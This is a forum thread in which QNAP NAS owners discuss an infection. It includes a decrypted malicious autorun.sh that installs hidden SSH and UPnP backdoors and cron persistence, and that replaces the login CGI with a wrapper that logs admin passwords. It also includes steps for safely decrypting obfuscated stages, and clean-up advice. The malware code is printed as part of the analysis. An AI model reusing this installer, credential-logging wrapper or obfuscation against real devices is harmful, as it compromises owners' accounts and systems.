case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` 

test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then 
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}

. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & } 
true;
}


#]
Thank you.
The Router is an ISP router, the nas is a QNAP nas, all software are up-to-date, the malware vehicle is one of the nas services. I exposed the nas to the network with 2fa strong password ecc ecc but it was not enough.
somy1982
Easy as a breeze
Posts: 372
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 »

benzo83 wrote:
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
somy1982
Easy as a breeze
Posts: 372
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 »

Mousetick wrote:This is a nasty piece of sh.itware you've got there.

I decrypted the autorun.sh (see further below).

I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs

So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.

Decrypted autorun.sh:

Code: Select all

#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; } 
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }

EOF
test "$fgrep" || fgrep=grep

test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"

test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"

test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }

cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }

chmod 755 "${bdir}/.${ipath}/${crons}.sh"

if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0" 
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi

for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"

grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && { 
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` 

test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then 
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}

. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & } 
true;
}


#]
Hi MouseTick,
Thanks for the reply! Can you tell us how to "decrypt" the shell script? Id like to look into mine and see if I can find anything myself.
I don't get the point why to disconnect from LAN?
somy1982
Easy as a breeze
Posts: 372
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 »

Also another question, is the following cron job save:
*/5 * * * * /mnt/ext/opt/apache/bin/php /mnt/ext/opt/qdesk/www/public/index.php cli watchdog woof
benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 »

somy1982 wrote:
benzo83 wrote:
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
unfortunately i do :cry:
User avatar
Don
Guru
Posts: 12289
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Strange folders and cronjobs

Post by Don »

You disconnect from the LAN to protect other devices on the LAN from being compromised by the NAS infection.
Use the forum search feature before posting.

Use RAID and external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced, and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.

NAS: TVS-882BR | F/W: 5.0.1.2346 | 40GB | 2 x 1TB M.2 SATA RAID 1 (System/VMs) | 3 x 1TB M.2 NMVe QM2-4P-384A RAID 5 (cache) | 5 x 14TB Exos HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-h674 | F/W: 5.0.1.2376 | 16GB | 3 x 18TB RAID 5
Apps: DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS3, Entware, DLstation, VS, +
Mousetick
Experience counts
Posts: 1081
Joined: Thu Aug 24, 2017 10:28 pm

Re: Strange folders and cronjobs

Post by Mousetick »

somy1982 wrote:Can you tell us how to "decrypt" the shell script? Id like to look into mine and see if I can find anything myself.
The only way to decrypt the script is to execute it because it is self-decrypting. Since executing it to completion is harmful, it needs to be surgically edited to keep the decryption part but disable the harmful part. That part changes from script to script so it's not easy to give general instructions. Also some scripts are encrypted with multiple passes, so the neutering process needs to be applied several times.

I greatly discourage you try to do this if you don't understand fully what I just said and what follows.

Example: autorun.sh posted by benzo83. Look for the note "<<<<<<<<<<============ DANGEROUS PART HERE" (added by me).

Code: Select all

#!/bin/sh

WDsKwcX=${NfPe}tr${TOtnQoPZlj}$XtvYzUmXi$'';XlvTWbP=$HwyETG$""${BOQDRIBofeJvZ}\\$KcLJmW$""${mBgBLqNugLIeP};WHJRnC=${AfESPMztIUpwo}${ayhM}${ifMZuHyfid}${XlvTWbP}1${ORdB}3${naPAXdYJve}3$nXrwvwbgB$'';HAFPgiL=${IQcueXfGmyiCy}${oUpr}${yVUyYguMwM}${XlvTWbP}0${cZew}5${NvQVndODqz}5$pDkAgrLTF$'';TQzLfG=${tfBBVkrxivfHq}${HJzN}${lDvZlgOBlx}${XlvTWbP}1${ybgg}3${oMdRZIuYWi}4$vcMuhGGuT$'';$WDsKwcX 'Cmi`BLh}Xfrg&vH+AjZKS'$WHJRnC't>]IV)YkTqz*QyPG{aN!OMR<cd '$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E' << "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
E>/fJ%/Cc|mBnkq\]x[d=em$$mjlMXT&VRmjYFOf+Oc*CIN&ABwsVmjB+z\A!M+\F)[`+&RABwszI}mj-#uVK[fG&}k%nmj}} V-cD&wsmrL-62r)JWVJ%mjOX)R+&wsVOmjlzx`kPAuAUk&)BmjNNI%tz&wsmjO!)I++`R&(kWCBws)%CBmjTn=cqz-PRU)c&mj*MZ\FB bWzqxW&mjJ"TBefqA&Vwsmj+kKV&)mrL-6BrCBVmjq-OMPTn&mjT()}N`Cu*&wsmjNYC]xc&B\mrL-61rWmj=xJOY*ZlWM&ws(mjK`n(bQKcY&kWCBwsmjx

...remainder omitted for brevity...
Before neutering

Code: Select all

'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
After neutering

Code: Select all

'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg"
Executing the neutered script produces the following ouput, another encrypted script:

Code: Select all

#!/bin/sh
$edaDvWOGKQH$""${CBNj}ty${JLrbRrhksoP}pe; t${eRcvpXBRvLuGVR}ype; com${xzEtMGbZ}mand${mmwtxhS}; $'\x62'uiltin${rNuyR}; tr${CcOVaqpEpUa}ue${PPonIc}; ${rXuoRRVy}false; unse${jdQhDcxqyUuh}${kBgvLewYlcDOl}${iAjeHbDp}t; ${RaMt}u$'\x6e'set${DxrBqjd}${jfumPVsEk}; ${PJsWOh}ev$'\x61'l${QOirJkgClB}; f${MVdfYFMhJ}alse; ${OwPbFgfCcHez}true; ${gcnlvMgKyJkNGy}$NpMsQSqXOMZ$''tes${VgejCHV}t; built${DsvVSOxeL}in; tr${SWtFlC}u${IcVJWwRLDBRDzF}$'\x65'${FYSAdkVijlD}; bu${OlJXwPpysLfOASB}${LGAY}${bGmFDmYdf}iltin; e$'\x76'a${dFhi}l${DxZfBKVfqtKS}; ${kWUAWXU}test; ${BualwUBF}builtin${kRKh}; $leEfFdMWUbFN$''uns${QzedDJQNeCz}e${HwPRGWnmjT}t; fal${tptQnbfJGUNApw}s${qPZqCftUdfd}e${mMNoReiqZIgL}; RxlSjPq=${JlEHKYwjrbodO}${xnxikuGpqHU}${DLlkJFP}tr; eVBTQyl=${JJRQ}${pksLKRdIF}\\${DpBH}${THSiqOYSU}; UVeZowLy=${mgMhJWRtg}${sytoKQCeJvGkIDw}$pctXOoTogzS$""${eVBTQyl}${IjiHrQctVyNBIdm}$wSiulfNuqQa$""13${LKaC}3; qewuHlK=${hAMbPTKJn}${oFzvTGoyZiAPyve}$eYjAzJvmNqy$""${eVBTQyl}${PphAxrnCnZWgzsz}$vIJVuAccEvM$""05${Ibid}5; gysIyg=${nLAzJEmiz}${ejCYiEfvQIJaqIU}$ovYxEfMaCWf$""${eVBTQyl}${XKvJYQlviynEHGt}$VSdvNePfJbJ$""13${IImJ}4; $RxlSjPq 's;t{CMau+&L`b'"'"'B!HfZwrld$VY'$gysIyg''$qewuHlK'Xy|Um)cN'$UVeZowLy']Ti* JIh<SW"\nRQkoO=(%}v#q>EzjKGFePgpAxDn' 'RjUOHgyV}ep%XQwkqi+ Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<= ========= DANGEROUS PART HERE
eG/qfl/%=y&WLDAgw*>ECihjx*>EC+:/qfl:/%qfl:/K%A/qfl:/K%A/%qfl:/K%A/qfl/b11:/K%A/SDJ$S/%qfl:/K%A/SDJ$S/qflhyJDUU$l)w(-w)fAl$U&wY/)&-/lKSSw2Y<1wmmw)fAl$U&wopwxwg&%gw(|whj1hw<<w&J=Dwh.hw<<wA&gKAlQwSDJ$SwAihjx1`hjx1eedzG/
+h+hQwJ$%&wjAwflw/dzG/
d/dmzG/
d/dpwAihjxA`/d+hQw&J=DwhjxA`hjxAeedzG/

... remainder omitted for brevity ...
Before neutering

Code: Select all

Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<========== DANGEROUS PART HERE
After neutering

Code: Select all

Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"
Executing the neutered 2nd stage script, produces the following output, the unencrypted autorun.sh:

Code: Select all

#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }

... remainder omitted for brevity ...
Post your script(s) here and I'll see what I can do.
I don't get the point why to disconnect from LAN?
As an extra precaution without knowing the source or the means by which the NAS was infected. In a way that's putting the NAS, which in benzo83's case may be running SSH & UPNP backdoors and who knows what else, under quarantine.
somy1982
Easy as a breeze
Posts: 372
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 »

benzo83 wrote:
somy1982 wrote:
benzo83 wrote:
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
unfortunately i do :cry:
Check all apps under .qpkg folder - reinstall them all if you can. I found many sh scripts infected. Also the ones malware remover claimed recovered!! When exactly on 25/8 did the file created? Mine wa around 9am Europe time.
Mousetick
Experience counts
Posts: 1081
Joined: Thu Aug 24, 2017 10:28 pm

Re: Strange folders and cronjobs

Post by Mousetick »

Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
AutorunDisable.png
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
You do not have the required permissions to view the files attached to this post.
somy1982
Easy as a breeze
Posts: 372
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 »

Mousetick wrote:Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
AutorunDisable.png
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
Thanks, have done that and removed the autorun.sh. Delete everything I could find and also removed all suspicious cron jobs. The NAS is restarted and the jobs are removed permanently seems.
Today I go into .qpkg folder and found many files being hacked, now I reinstalled all apps. Hopefully that's it. Otherwise I have to start from scratch :-(
Anybody know if QNAP provide a way to completely reset QTS OS and leave data unchanged?
Post Reply

Return to “System & Disk Volume Management”